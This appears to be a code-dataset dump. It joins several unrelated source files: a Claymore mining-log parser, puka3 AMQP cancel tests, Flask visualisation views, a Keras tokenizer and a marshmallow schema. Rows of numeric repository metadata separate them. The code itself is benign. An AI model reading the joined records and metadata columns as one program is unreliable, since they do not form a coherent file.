        # triggers writing one summary record to the JSON and CSV outputs
        m = re.match(r"Eth: Effective speed: (\d+\.\d+) MH/s; at pool: (\d+\.\d+) MH/s", input_line)
        if m:
            matches = m.groups()
            effectiveSpeed = {
                'effectiveSpeed': matches[0],
                'effectiveSpeedAtPool': matches[1]
            }
            # only emit a record once every section has been seen at least
            # once; avoids a KeyError on a partial first summary
            if timeStamp and connectionInfo and shareCount and incorrectShares and averageSpeed:
                summaryRecord = {
                    'timeStamp': timeStamp,
                    'connectionInfo': connectionInfo,
                    'shareCount': shareCount,
                    'incorrectShares': incorrectShares,
                    'maximumDifficultyOfFoundShare': maximumDifficultyOfFoundShare,
                    'averageSpeed': averageSpeed,
                    'effectiveSpeed': effectiveSpeed
                }
                # BUG FIX: records after the first were previously written with
                # Python repr() (single quotes), producing invalid JSON; every
                # record now goes through json.dumps, comma-separated
                prefix = ',' if summary_records_written > 0 else ''
                summaryJSONFile.write('{}{}\n'.format(prefix, json.dumps(summaryRecord)))
                summaryJSONFile.flush()
                summary_records_written = summary_records_written + 1
                values = [
                    timeStamp['hoursMined'],
                    timeStamp['minutesMined'],
                    timeStamp['timeStampMonth'],
                    timeStamp['timeStampDay'],
                    timeStamp['timeStampHours'],
                    timeStamp['timeStampMinutes'],
                    connectionInfo['miningServer'],
                    connectionInfo['miningPort'],
                    connectionInfo['miningDurationHours'],
                    connectionInfo['miningDurationMinutes'],
                    incorrectShares['incorrectShares'],
                    incorrectShares['incorrectSharePercentage'],
                    incorrectShares['estimatedStalesPercentage'],
                    maximumDifficultyOfFoundShare,
                    shareCount['acceptedShares'],
                    shareCount['staleShares'],
                    shareCount['rejectedShares'],
                    shareCount['rejectedStaleShares'],
                    averageSpeed['averageSpeedMinutes'],
                    averageSpeed['averageMegaHashes'],
                    effectiveSpeed['effectiveSpeed'],
                    effectiveSpeed['effectiveSpeedAtPool'],
                    datetime.now().strftime("%m/%d/%Y %H:%M:%S")
                ]
                summaryCSVFile.write('{}\n'.format(','.join(values)))
                summaryCSVFile.flush()
        # per-GPU details, e.g. 'GPU1: 43C 75% 120W'
        m = re.match(r"GPU(\d+): (\d+)C (\d+)% (\d+)W", input_line)
        if m:
            matches = m.groups()
            gpuDetails = {
                'gpuNumber': matches[0],
                'gpuTemperatureCelcius': matches[1],
                'gpuPowerPercentage': matches[2],
                'gpuWattage': matches[3]
            }
        # total board power, e.g. 'GPUs power: 119.8 W'
        m = re.match(r"GPUs power: (\d+\.\d+) W", input_line)
        if m:
            gpuPower = {
                'totalGPUsPower': m.groups()[0]
            }
        # speed update, e.g. 'Eth speed: 57.581 MH/s, shares: 17/0/0, time: 1:05'
        m = re.match(r"Eth speed: (\d+\.\d+) MH/s, shares: (\d+)/(\d+)/(\d+), time: (\d+):(\d+)", input_line)
        if m:
            matches = m.groups()
            speedUpdate = {
                'ethSpeedMegaHashes': matches[0],
                'acceptedShares': matches[1],
                'staleShares': matches[2],
                'rejectedShares': matches[3],
                'miningDurationHours': matches[4],
                'miningDurationMinutes': matches[5]
            }
        if retcode is not None:
            break
except BaseException:
    # intentionally broad (replaces a bare except) so the miner process is
    # terminated even on KeyboardInterrupt; guard in case Popen itself failed
    # before p was bound
    if 'p' in locals():
        p.terminate()
#make sure to terminate the process and write close the json array in the output file
finally:
    summaryJSONFile.write(']\n')
    summaryJSONFile.flush()
    summaryLogFile.write('Process Claymore Data Script Ended {}\n'.format(datetime.now().strftime("%m/%d/%Y %H-%M-%S")))
    summaryLogFile.flush()
| 30.31221
| 188
| 0.693759
| 2,298
| 19,612
| 5.859008
| 0.141862
| 0.006536
| 0.011884
| 0.017825
| 0.991236
| 0.98975
| 0.98975
| 0.986928
| 0.986928
| 0.984551
| 0
| 0.013971
| 0.153274
| 19,612
| 646
| 189
| 30.359133
| 0.79682
| 0.15827
| 0
| 0.925926
| 0
| 0.016461
| 0.325196
| 0.055397
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028807
| 0
| 0.028807
| 0.004115
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c0440a41ad645e62e2cefdf8b3483e39206ddc93
| 161
|
py
|
Python
|
pylux_tb/__init__.py
|
sglux/iot-sglux-com-example-1
|
55b2617297c26066e7fbe502d46ceb6ecdfb7c85
|
[
"MIT"
] | null | null | null |
pylux_tb/__init__.py
|
sglux/iot-sglux-com-example-1
|
55b2617297c26066e7fbe502d46ceb6ecdfb7c85
|
[
"MIT"
] | 6
|
2020-09-24T15:37:56.000Z
|
2021-03-18T16:36:41.000Z
|
pylux_tb/__init__.py
|
sglux/iot-sglux-com-example-1
|
55b2617297c26066e7fbe502d46ceb6ecdfb7c85
|
[
"MIT"
] | null | null | null |
# __init__.py
from .pylux_tb import get_num_input
from .pylux_tb import tb_auth_header
from .pylux_tb import tb_req_header
from .pylux_tb import tb_auth_data
| 32.2
| 37
| 0.832298
| 30
| 161
| 3.933333
| 0.433333
| 0.305085
| 0.372881
| 0.576271
| 0.652542
| 0.652542
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130435
| 161
| 5
| 38
| 32.2
| 0.842857
| 0.068323
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c05c3c47a3dcb4fd52494d5e1f2d21d8456892f0
| 5,002
|
py
|
Python
|
tests/test_cancel.py
|
authbox-lib/puka3
|
2fea0f4124643514684b7e1da4fd696c78a9cb7d
|
[
"MIT"
] | null | null | null |
tests/test_cancel.py
|
authbox-lib/puka3
|
2fea0f4124643514684b7e1da4fd696c78a9cb7d
|
[
"MIT"
] | null | null | null |
tests/test_cancel.py
|
authbox-lib/puka3
|
2fea0f4124643514684b7e1da4fd696c78a9cb7d
|
[
"MIT"
] | null | null | null |
import os
import puka3
import base
class TestCancel(base.TestCase):
    """Integration tests for consumer cancellation against a live AMQP broker.

    NOTE(review): each ``client.wait(...)`` consumes one ordered broker
    reply, so statement order is significant; the bodies are documented
    rather than restructured.  Requires the connection fixture supplied by
    ``base.connect`` -- confirm against the base module.
    """

    @base.connect
    def test_cancel_single(self, client):
        # Declare a queue and publish one message into it.
        promise = client.queue_declare(queue=self.name)
        client.wait(promise)
        promise = client.basic_publish(exchange='', routing_key=self.name,
                                       body='a')
        client.wait(promise)
        # Consume the message, then explicitly cancel the consumer.
        consume_promise = client.basic_consume(queue=self.name, prefetch_count=1)
        result = client.wait(consume_promise)
        self.assertEqual(result['body'], 'a')
        promise = client.basic_cancel(consume_promise)
        result = client.wait(promise)
        # cancel-ok carries the tag of the cancelled consumer
        self.assertTrue('consumer_tag' in result)
        # TODO: better error
        # It's illegal to wait on consume_promise after cancel.
        #with self.assertRaises(Exception):
        #    client.wait(consume_promise)
        promise = client.queue_delete(queue=self.name)
        client.wait(promise)

    @base.connect
    def test_cancel_multi(self, client):
        # One message in each of three queues, consumed via a multi-consumer.
        names = [self.name, self.name1, self.name2]
        for name in names:
            promise = client.queue_declare(queue=name)
            client.wait(promise)
            promise = client.basic_publish(exchange='', routing_key=name,
                                           body='a')
            client.wait(promise)
        consume_promise = client.basic_consume_multi(queues=names,
                                                     no_ack=True)
        # expect exactly one delivery per queue
        for i in range(len(names)):
            result = client.wait(consume_promise)
            self.assertEqual(result['body'], 'a')
        promise = client.basic_cancel(consume_promise)
        result = client.wait(promise)
        self.assertTrue('consumer_tag' in result)
        # TODO: better error
        #with self.assertRaises(Exception):
        #    client.wait(consume_promise)
        promise = client.queue_delete(queue=self.name)
        client.wait(promise)

    @base.connect
    def test_cancel_single_notification(self, client):
        # Deleting the consumed queue should make the broker cancel the
        # consumer and notify us (basic.cancel_ok on the consume promise).
        promise = client.queue_declare(queue=self.name)
        client.wait(promise)
        promise = client.basic_publish(exchange='', routing_key=self.name,
                                       body='a')
        client.wait(promise)
        consume_promise = client.basic_consume(queue=self.name, prefetch_count=1)
        result = client.wait(consume_promise)
        self.assertEqual(result['body'], 'a')
        promise = client.queue_delete(self.name)
        result = client.wait(consume_promise)
        self.assertEqual(result.name, 'basic.cancel_ok')
        # Make sure the consumer died:
        promise = client.queue_declare(queue=self.name)
        result = client.wait(promise)
        self.assertEqual(result['consumer_count'], 0)

    @base.connect
    def test_cancel_multi_notification(self, client):
        # Deleting one of the consumed queues cancels the whole
        # multi-consumer and raises a single notification.
        names = [self.name, self.name1, self.name2]
        for name in names:
            promise = client.queue_declare(queue=name)
            client.wait(promise)
            promise = client.basic_publish(exchange='', routing_key=name,
                                           body='a')
            client.wait(promise)
        consume_promise = client.basic_consume_multi(queues=names,
                                                     no_ack=True)
        for i in range(len(names)):
            result = client.wait(consume_promise)
            self.assertEqual(result['body'], 'a')
        promise = client.queue_delete(names[0])
        result = client.wait(consume_promise)
        self.assertEqual(result.name, 'basic.cancel_ok')
        # Make sure the consumer died:
        for name in names:
            promise = client.queue_declare(queue=name)
            result = client.wait(promise)
            self.assertEqual(result['consumer_count'], 0)

    @base.connect
    def test_cancel_multi_notification_concurrent(self, client):
        # Two concurrent queue deletions must still produce exactly one
        # cancel notification for the multi-consumer.
        names = [self.name, self.name1, self.name2]
        for name in names:
            promise = client.queue_declare(queue=name)
            client.wait(promise)
            promise = client.basic_publish(exchange='', routing_key=name,
                                           body='a')
            client.wait(promise)
        consume_promise = client.basic_consume_multi(queues=names,
                                                     no_ack=True)
        for i in range(len(names)):
            result = client.wait(consume_promise)
            self.assertEqual(result['body'], 'a')
        client.queue_delete(names[0])
        client.queue_delete(names[2])
        result = client.wait(consume_promise)
        self.assertEqual(result.name, 'basic.cancel_ok')
        # Make sure the consumer died:
        for name in names:
            promise = client.queue_declare(queue=name)
            result = client.wait(promise)
            self.assertEqual(result['consumer_count'], 0)
# Allow running this test module directly via the project's test runner.
if __name__ == '__main__':
    import tests
    tests.run_unittests(globals())
| 33.797297
| 81
| 0.594362
| 547
| 5,002
| 5.274223
| 0.13894
| 0.093588
| 0.100173
| 0.106759
| 0.934489
| 0.921664
| 0.907452
| 0.895667
| 0.895667
| 0.895667
| 0
| 0.004315
| 0.305078
| 5,002
| 147
| 82
| 34.027211
| 0.825662
| 0.061975
| 0
| 0.84
| 0
| 0
| 0.031844
| 0
| 0
| 0
| 0
| 0.006803
| 0.13
| 1
| 0.05
| false
| 0
| 0.04
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
221fac707309283c0ad47529eeff8e3c9fe6f8c4
| 8,060
|
py
|
Python
|
contextualise/visualisation.py
|
wjnbreu/contextualise
|
3189c5b3a829ebb4ee1af4e9608eac6eab26ebaf
|
[
"MIT"
] | 1,005
|
2019-03-25T12:05:20.000Z
|
2022-03-17T11:40:04.000Z
|
contextualise/visualisation.py
|
wjnbreu/contextualise
|
3189c5b3a829ebb4ee1af4e9608eac6eab26ebaf
|
[
"MIT"
] | 113
|
2019-09-30T00:36:34.000Z
|
2022-02-15T19:58:45.000Z
|
contextualise/visualisation.py
|
wjnbreu/contextualise
|
3189c5b3a829ebb4ee1af4e9608eac6eab26ebaf
|
[
"MIT"
] | 50
|
2019-09-30T00:36:59.000Z
|
2022-02-16T03:41:08.000Z
|
import maya
from flask import Blueprint, render_template
from flask_login import current_user
from topicdb.core.store.retrievalmode import RetrievalMode
from werkzeug.exceptions import abort
from contextualise.topic_store import get_topic_store
bp = Blueprint("visualisation", __name__)
@bp.route("/visualisations/network/<map_identifier>/<topic_identifier>")
def network(map_identifier, topic_identifier):
    """Render the network visualisation for a topic, enforcing map access rules."""
    topic_store = get_topic_store()

    logged_in = current_user.is_authenticated
    if logged_in:
        is_map_owner = topic_store.is_topic_map_owner(map_identifier, current_user.id)
        topic_map = (
            topic_store.get_topic_map(map_identifier, current_user.id)
            if is_map_owner
            else topic_store.get_topic_map(map_identifier)
        )
    else:
        is_map_owner = False
        topic_map = topic_store.get_topic_map(map_identifier)
    if topic_map is None:
        abort(404)

    collaboration_mode = (
        topic_store.get_collaboration_mode(map_identifier, current_user.id)
        if logged_in
        else None
    )
    if not topic_map.published:
        # a private map is visible only to its owner or a collaborator
        if not logged_in or (not is_map_owner and not collaboration_mode):
            abort(403)

    topic = topic_store.get_topic(
        map_identifier,
        topic_identifier,
        resolve_attributes=RetrievalMode.RESOLVE_ATTRIBUTES,
    )
    if topic is None:
        abort(404)

    stamp_attribute = topic.get_attribute_by_name("creation-timestamp")
    creation_date = maya.parse(stamp_attribute.value) if stamp_attribute else "Undefined"
    return render_template(
        "visualisation/network.html",
        topic_map=topic_map,
        topic=topic,
        creation_date=creation_date,
        collaboration_mode=collaboration_mode,
    )
@bp.route("/visualisations/tags-cloud/<map_identifier>/<topic_identifier>")
def tags_cloud(map_identifier, topic_identifier):
    """Render the tags-cloud visualisation for a topic.

    A private map is only visible to its owner or a collaborator; anonymous
    users only see published maps.  Tag frequencies are counted from the
    "narrower" members of the topic map's categorization associations.
    """
    topic_store = get_topic_store()
    collaboration_mode = None
    if current_user.is_authenticated:  # User is logged in
        is_map_owner = topic_store.is_topic_map_owner(map_identifier, current_user.id)
        if is_map_owner:
            topic_map = topic_store.get_topic_map(map_identifier, current_user.id)
        else:
            topic_map = topic_store.get_topic_map(map_identifier)
        if topic_map is None:
            abort(404)
        collaboration_mode = topic_store.get_collaboration_mode(map_identifier, current_user.id)
        # The map is private and doesn't belong to the user who is trying to
        # access it
        if not topic_map.published and not is_map_owner:
            if not collaboration_mode:  # The user is not collaborating on the map
                abort(403)
    else:  # User is not logged in
        topic_map = topic_store.get_topic_map(map_identifier)
        if topic_map is None:
            abort(404)
        if not topic_map.published:  # Anonymous users only see published maps
            abort(403)
    topic = topic_store.get_topic(
        map_identifier,
        topic_identifier,
        resolve_attributes=RetrievalMode.RESOLVE_ATTRIBUTES,
    )
    if topic is None:
        abort(404)
    associations = topic_store.get_topic_associations(map_identifier, "tags", instance_ofs=["categorization"])
    # count tag occurrences; dict.get replaces the original
    # lookup/increment/store sequence with an idiomatic single line
    tags = {}
    for association in associations:
        for member in association.members:
            if member.role_spec == "narrower":
                for topic_ref in member.topic_refs:
                    tags[topic_ref] = tags.get(topic_ref, 0) + 1
    creation_date_attribute = topic.get_attribute_by_name("creation-timestamp")
    creation_date = maya.parse(creation_date_attribute.value) if creation_date_attribute else "Undefined"
    # NOTE(review): the local collaboration_mode computed above is unused
    # here; the template receives topic_map.collaboration_mode (the network
    # view passes the local value instead) -- confirm which is intended.
    return render_template(
        "visualisation/tags_cloud.html",
        topic_map=topic_map,
        topic=topic,
        creation_date=creation_date,
        collaboration_mode=topic_map.collaboration_mode,
        tags=tags,
    )
@bp.route("/visualisations/timeline/<map_identifier>/<topic_identifier>")
def timeline(map_identifier, topic_identifier):
    """Render the timeline visualisation for a topic, enforcing map access rules."""
    topic_store = get_topic_store()

    logged_in = current_user.is_authenticated
    if logged_in:
        is_map_owner = topic_store.is_topic_map_owner(map_identifier, current_user.id)
        topic_map = (
            topic_store.get_topic_map(map_identifier, current_user.id)
            if is_map_owner
            else topic_store.get_topic_map(map_identifier)
        )
    else:
        is_map_owner = False
        topic_map = topic_store.get_topic_map(map_identifier)
    if topic_map is None:
        abort(404)

    collaboration_mode = (
        topic_store.get_collaboration_mode(map_identifier, current_user.id)
        if logged_in
        else None
    )
    if not topic_map.published:
        # a private map is visible only to its owner or a collaborator
        if not logged_in or (not is_map_owner and not collaboration_mode):
            abort(403)

    topic = topic_store.get_topic(
        map_identifier,
        topic_identifier,
        resolve_attributes=RetrievalMode.RESOLVE_ATTRIBUTES,
    )
    if topic is None:
        abort(404)

    stamp_attribute = topic.get_attribute_by_name("creation-timestamp")
    creation_date = maya.parse(stamp_attribute.value) if stamp_attribute else "Undefined"
    # NOTE(review): the local collaboration_mode is unused here; the template
    # receives topic_map.collaboration_mode as in the original -- confirm.
    return render_template(
        "visualisation/timeline.html",
        topic_map=topic_map,
        topic=topic,
        creation_date=creation_date,
        collaboration_mode=topic_map.collaboration_mode,
    )
@bp.route("/visualisations/map/<map_identifier>/<topic_identifier>")
def geographic_map(map_identifier, topic_identifier):
    """Render the geographic-map visualisation for a topic, enforcing map access rules."""
    topic_store = get_topic_store()

    logged_in = current_user.is_authenticated
    if logged_in:
        is_map_owner = topic_store.is_topic_map_owner(map_identifier, current_user.id)
        topic_map = (
            topic_store.get_topic_map(map_identifier, current_user.id)
            if is_map_owner
            else topic_store.get_topic_map(map_identifier)
        )
    else:
        is_map_owner = False
        topic_map = topic_store.get_topic_map(map_identifier)
    if topic_map is None:
        abort(404)

    collaboration_mode = (
        topic_store.get_collaboration_mode(map_identifier, current_user.id)
        if logged_in
        else None
    )
    if not topic_map.published:
        # a private map is visible only to its owner or a collaborator
        if not logged_in or (not is_map_owner and not collaboration_mode):
            abort(403)

    topic = topic_store.get_topic(
        map_identifier,
        topic_identifier,
        resolve_attributes=RetrievalMode.RESOLVE_ATTRIBUTES,
    )
    if topic is None:
        abort(404)

    stamp_attribute = topic.get_attribute_by_name("creation-timestamp")
    creation_date = maya.parse(stamp_attribute.value) if stamp_attribute else "Undefined"
    # NOTE(review): the local collaboration_mode is unused here; the template
    # receives topic_map.collaboration_mode as in the original -- confirm.
    return render_template(
        "visualisation/geographic_map.html",
        topic_map=topic_map,
        topic=topic,
        creation_date=creation_date,
        collaboration_mode=topic_map.collaboration_mode,
    )
| 38.75
| 110
| 0.684119
| 1,045
| 8,060
| 4.973206
| 0.084211
| 0.090822
| 0.062536
| 0.072734
| 0.883587
| 0.846835
| 0.837983
| 0.837983
| 0.837983
| 0.837983
| 0
| 0.010272
| 0.251117
| 8,060
| 207
| 111
| 38.937198
| 0.850729
| 0.103598
| 0
| 0.767442
| 0
| 0
| 0.069167
| 0.04875
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023256
| false
| 0
| 0.034884
| 0
| 0.081395
| 0.011628
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2220225e920bd6989da92be9dced0ab59b634f0b
| 8,194
|
py
|
Python
|
tokenizer.py
|
projcon/callcon2021
|
c2efd51871dcc6d510855049aec5f18e5dc68958
|
[
"MIT"
] | 1
|
2021-07-26T13:10:29.000Z
|
2021-07-26T13:10:29.000Z
|
tokenizer.py
|
projcon/callcon2021
|
c2efd51871dcc6d510855049aec5f18e5dc68958
|
[
"MIT"
] | null | null | null |
tokenizer.py
|
projcon/callcon2021
|
c2efd51871dcc6d510855049aec5f18e5dc68958
|
[
"MIT"
] | null | null | null |
import collections
from keras.preprocessing.sequence import pad_sequences
import pickle
import numpy as np
# 0 is reserved
# make UNK token something
# make vocab size a requirement on creation
# Huge thanks to Leclair et al. for making their tokenizer open source in https://github.com/mcmillco/funcom
class Tokenizer(object):
def __init__(self):
    """Create an empty, untrained tokenizer."""
    self.word_count = collections.Counter()  # raw token frequencies
    self.w2i = {}  # word -> integer index (filled by train()/update())
    self.i2w = {}  # integer index -> word
    self.oov_index = None  # index used for out-of-vocabulary tokens
    self.vocab_size = None  # effective vocabulary size incl. <NULL>/<UNK>
    self.vectors = {}  # NOTE(review): never populated in this file -- confirm external use
def save(self, path):
pickle.dump(self, open(path, 'wb'))
def load(self, path):
return pickle.load(open(path, 'rb'))
def train(self, texts, vocab_size):
if len(self.word_count) != 0:
raise Exception("To update existing tokenizer with new vocabulary, run update() or update_from_file()")
# takes a list of strings that are space delimited into tokens
for sent in texts:
for w in sent.split():
self.word_count[w] += 1
self.vocab_size = vocab_size
# Easily changed but vocab size is essentially defining your max index
# 0 is reserved and UNK is reserved so you will get vocab_size-2 to get
# indices from 0-(vocab_size-1) i.e. vocab_size = 50, we get indices 0-49
for count, w in enumerate(self.word_count.most_common(self.vocab_size-2)):
self.w2i[w[0]] = count+1
self.i2w[count+1] = w[0]
self.oov_index = min([self.vocab_size-1, len(self.word_count)+1])
self.vocab_size = self.oov_index+1
self.w2i['<UNK>'] = self.oov_index
self.w2i['<NULL>'] = 0
self.i2w[0] = '<NULL>'
self.i2w[self.oov_index] = '<UNK>'
def train_from_file(self, path, vocab_size):
if len(self.word_count) != 0:
raise Exception("To update existing tokenizer with new vocabulary, run update() or update_from_file()")
# This is for our file representation of "fid, text\n"
self.vocab_size = vocab_size
for line in open(path):
tmp = [x.strip() for x in line.split(',')]
# takes a list of strings that are space delimited into tokens
fid = tmp[0]
sent = tmp[1]
for w in sent.split():
self.word_count[w] += 1
# Easily changed but vocab size is essentially defining your max index
# 0 is reserved and UNK is reserved so you will get vocab_size-2 to get
# indices from 0-(vocab_size-1) i.e. vocab_size = 50, we get indices 0-49
for count, w in enumerate(self.word_count.most_common(self.vocab_size-2)):
self.w2i[w[0]] = count+1
self.i2w[count+1] = w[0]
self.oov_index = min([self.vocab_size-1, len(self.word_count)+1])
self.vocab_size = self.oov_index+1
self.w2i['<UNK>'] = self.oov_index
self.w2i['<NULL>'] = 0
self.i2w[0] = '<NULL>'
self.i2w[self.oov_index] = '<UNK>'
def update(self, texts):
# takes a list of strings that are space delimited into tokens
for sent in texts:
for w in sent.split():
self.word_count[w] += 1
# reset w2i and i2w for new vocab
self.w2i = {}
self.i2w = {}
# Easily changed but vocab size is essentially defining your max index
# 0 is reserved and UNK is reserved so you will get vocab_size-2 to get
# indices from 0-(vocab_size-1) i.e. vocab_size = 50, we get indices 0-49
for count, w in enumerate(self.word_count.most_common(self.vocab_size-2)):
self.w2i[w[0]] = count+1
self.i2w[count+1] = w[0]
self.oov_index = min([self.vocab_size-1, len(self.word_count)+1])
self.vocab_size = self.oov_index+1
self.w2i['<UNK>'] = self.oov_index
self.w2i['<NULL>'] = 0
self.i2w[0] = '<NULL>'
self.i2w[self.oov_index] = '<UNK>'
def update_from_file(self, path):
# takes a list of strings that are space delimited into tokens
for line in open(path):
tmp = [x.strip() for x in line.split(',')]
# takes a list of strings that are space delimited into tokens
fid = tmp[0]
sent = tmp[1]
for w in sent.split():
self.word_count[w] += 1
# reset w2i and i2w for new vocab
self.w2i = {}
self.i2w = {}
# Easily changed but vocab size is essentially defining your max index
# 0 is reserved and UNK is reserved so you will get vocab_size-2 to get
# indices from 0-(vocab_size-1) i.e. vocab_size = 50, we get indices 0-49
for count, w in enumerate(self.word_count.most_common(self.vocab_size-2)):
self.w2i[w[0]] = count+1
self.i2w[count+1] = w[0]
self.oov_index = min([self.vocab_size-1, len(self.word_count)+1])
self.vocab_size = self.oov_index+1
self.w2i['<UNK>'] = self.oov_index
self.w2i['<NULL>'] = 0
self.i2w[0] = '<NULL>'
self.i2w[self.oov_index] = '<UNK>'
def set_vocab_size(self, vocab_size):
    """Set a new vocabulary cap and rebuild the index maps from the counts.

    NOTE: unlike update(), this keeps the requested vocab_size as-is even
    when fewer words have been counted.
    """
    self.vocab_size = vocab_size
    # Fresh word<->index maps for the resized vocabulary.
    self.w2i = {}
    self.i2w = {}
    # 0 is reserved for <NULL> and one slot for <UNK>, so the vocab_size-2
    # most frequent tokens receive indices 1..vocab_size-2.
    for rank, (token, _count) in enumerate(self.word_count.most_common(self.vocab_size - 2), start=1):
        self.w2i[token] = rank
        self.i2w[rank] = token
    self.oov_index = min(self.vocab_size - 1, len(self.word_count) + 1)
    self.w2i['<UNK>'] = self.oov_index
    self.w2i['<NULL>'] = 0
    self.i2w[0] = '<NULL>'
    self.i2w[self.oov_index] = '<UNK>'
def texts_to_sequences(self, texts, maxlen=None, padding='post', truncating='post', value=0):
    """Convert space-delimited strings to padded lists of word indices.

    Unknown words map to self.oov_index. Each sequence is cut at `maxlen`
    tokens before being handed to pad_sequences for padding/truncation.

    Raises Exception if the tokenizer has never been trained.
    """
    if not self.word_count:
        raise Exception("Tokenizer has not been trained, no words in vocabulary.")
    all_seq = []
    for sent in texts:
        seq = []
        for w in sent.split():
            # Fix: dict.get replaces a bare `except:` that swallowed every
            # exception type (including KeyboardInterrupt) on OOV lookups.
            seq.append(self.w2i.get(w, self.oov_index))
            if maxlen is not None and len(seq) == maxlen:
                break
        all_seq.append(seq)
    return pad_sequences(all_seq, maxlen=maxlen, padding=padding, truncating=truncating, value=value)
def texts_to_sequences_from_file(self, path, maxlen=50, padding='post', truncating='post', value=0):
    """Read "<fid>,<sentence>" lines and return {fid: padded index sequence}.

    fid is parsed as int; unknown words map to self.oov_index; sequences are
    cut at `maxlen` tokens, then padded/truncated by pad_sequences.

    Raises Exception if the tokenizer has never been trained.

    NOTE(review): `line.split(',')[1]` drops any text after a second comma,
    as in the original — confirm sentences never contain commas.
    """
    if not self.word_count:
        raise Exception("Tokenizer has not been trained, no words in vocabulary.")
    all_seq = {}
    # Fix: context manager closes the file (the original open() leaked it).
    with open(path) as fh:
        for line in fh:
            parts = [p.strip() for p in line.split(',')]
            fid = int(parts[0])
            sent = parts[1]
            seq = []
            for w in sent.split():
                # Fix: dict.get replaces the bare `except:` on OOV lookups.
                seq.append(self.w2i.get(w, self.oov_index))
                if maxlen is not None and len(seq) == maxlen:
                    break
            all_seq[fid] = seq
    padded = pad_sequences(list(all_seq.values()), maxlen=maxlen, padding=padding, truncating=truncating, value=value)
    return dict(zip(all_seq.keys(), padded))
def seq_to_text(self, seq):
    """Map a sequence of indices back to their tokens via i2w."""
    tokens = []
    for idx in seq:
        tokens.append(self.i2w[idx])
    return tokens
def forw2v(self, seq):
    """Like seq_to_text, but drop padding/sentence-boundary markers.

    Intended for feeding text to word2vec-style training, where
    <NULL>, <s> and </s> carry no content.
    """
    markers = ('<NULL>', '<s>', '</s>')
    tokens = []
    for idx in seq:
        token = self.i2w[idx]
        if token not in markers:
            tokens.append(token)
    return tokens
| 40.364532
| 169
| 0.563217
| 1,164
| 8,194
| 3.864261
| 0.131443
| 0.092041
| 0.058693
| 0.032014
| 0.8257
| 0.799244
| 0.799244
| 0.799244
| 0.799244
| 0.77301
| 0
| 0.029599
| 0.327923
| 8,194
| 202
| 170
| 40.564356
| 0.78718
| 0.229314
| 0
| 0.762963
| 0
| 0
| 0.069725
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088889
| false
| 0
| 0.02963
| 0.022222
| 0.162963
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
223904721ba80255e95f0654d51d897f5edf14ef
| 636
|
py
|
Python
|
ddb/feature/version/schema.py
|
gfi-centre-ouest/docker-devbox-ddb
|
1597d85ef6e9e8322cce195a454de54186ce9ec7
|
[
"MIT"
] | 4
|
2020-06-11T20:54:47.000Z
|
2020-09-22T13:07:17.000Z
|
ddb/feature/version/schema.py
|
gfi-centre-ouest/docker-devbox-ddb
|
1597d85ef6e9e8322cce195a454de54186ce9ec7
|
[
"MIT"
] | 113
|
2019-11-07T00:40:36.000Z
|
2021-01-18T12:50:16.000Z
|
ddb/feature/version/schema.py
|
inetum-orleans/docker-devbox-ddb
|
20c713cf7bfcaf289226a17a9648c17d16003b4d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from marshmallow import fields
from ddb.feature.schema import FeatureSchema
class VersionSchema(FeatureSchema):
    """
    Version schema.

    Holds version-related metadata (branch, tag, version, hash, short_hash).
    All fields allow None because the actual defaults are filled in later by
    the feature's _configure_defaults hook.
    """
    branch = fields.String(allow_none=True)  # default is set in feature _configure_defaults
    tag = fields.String(allow_none=True)  # default is set in feature _configure_defaults
    version = fields.String(allow_none=True)  # default is set in feature _configure_defaults
    hash = fields.String(allow_none=True)  # default is set in feature _configure_defaults
    short_hash = fields.String(allow_none=True)  # default is set in feature _configure_defaults
| 39.75
| 96
| 0.748428
| 84
| 636
| 5.47619
| 0.345238
| 0.130435
| 0.184783
| 0.228261
| 0.702174
| 0.702174
| 0.702174
| 0.702174
| 0.702174
| 0.702174
| 0
| 0.001898
| 0.171384
| 636
| 15
| 97
| 42.4
| 0.870968
| 0.415094
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
224d4c43569011fbc32ebc7385177fe888c00b26
| 11,187
|
py
|
Python
|
apps/newsletters/views.py
|
lance0428/NewsBlur
